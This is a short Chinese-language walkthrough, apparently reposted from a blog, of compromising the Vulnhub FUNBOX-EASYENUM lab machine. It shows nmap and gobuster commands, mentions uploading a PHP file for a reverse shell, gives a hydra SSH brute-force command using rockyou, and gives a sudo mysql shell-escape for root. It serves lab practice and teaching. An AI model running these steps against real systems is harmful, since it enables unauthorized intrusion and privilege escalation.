其他分享
首页 > 其他分享> > Vulnhub:FUNBOX-EASYENUM靶机

Vulnhub:FUNBOX-EASYENUM靶机

作者:互联网

1.浏览器输入目标靶机IP地址浏览网页
在这里插入图片描述
2.端口扫描

nmap -p- 192.168.31.128
nmap -sC  -sV -p 22,80 192.168.31.128

在这里插入图片描述
3.目录枚举
目录枚举的时候找到了一个有意思的mini.php目录

gobuster dir -u http://192.168.31.128 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,html.txt

在这里插入图片描述
4.在浏览器打开mini.php,经过测试可以上传.php文件
在这里插入图片描述
上传php文件,反弹shell
在这里插入图片描述
5.在/home目录下发现存在五个用户,使用暴力破解得出goat用户的SSH登录密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.31.128  ssh 

在这里插入图片描述

在这里插入图片描述
6.ssh登录系统之后,使用sudo -l命令发现可以使用mysql提权
使用提权语句 mysql -e '\! /bin/bash'成功获取root权限
在这里插入图片描述
最后,谢谢大家伙百忙之中观看我的文章。

标签:mini,php,31.128,192.168,Vulnhub,txt,FUNBOX,目录,EASYENUM
来源: https://blog.csdn.net/logan_logan/article/details/117622754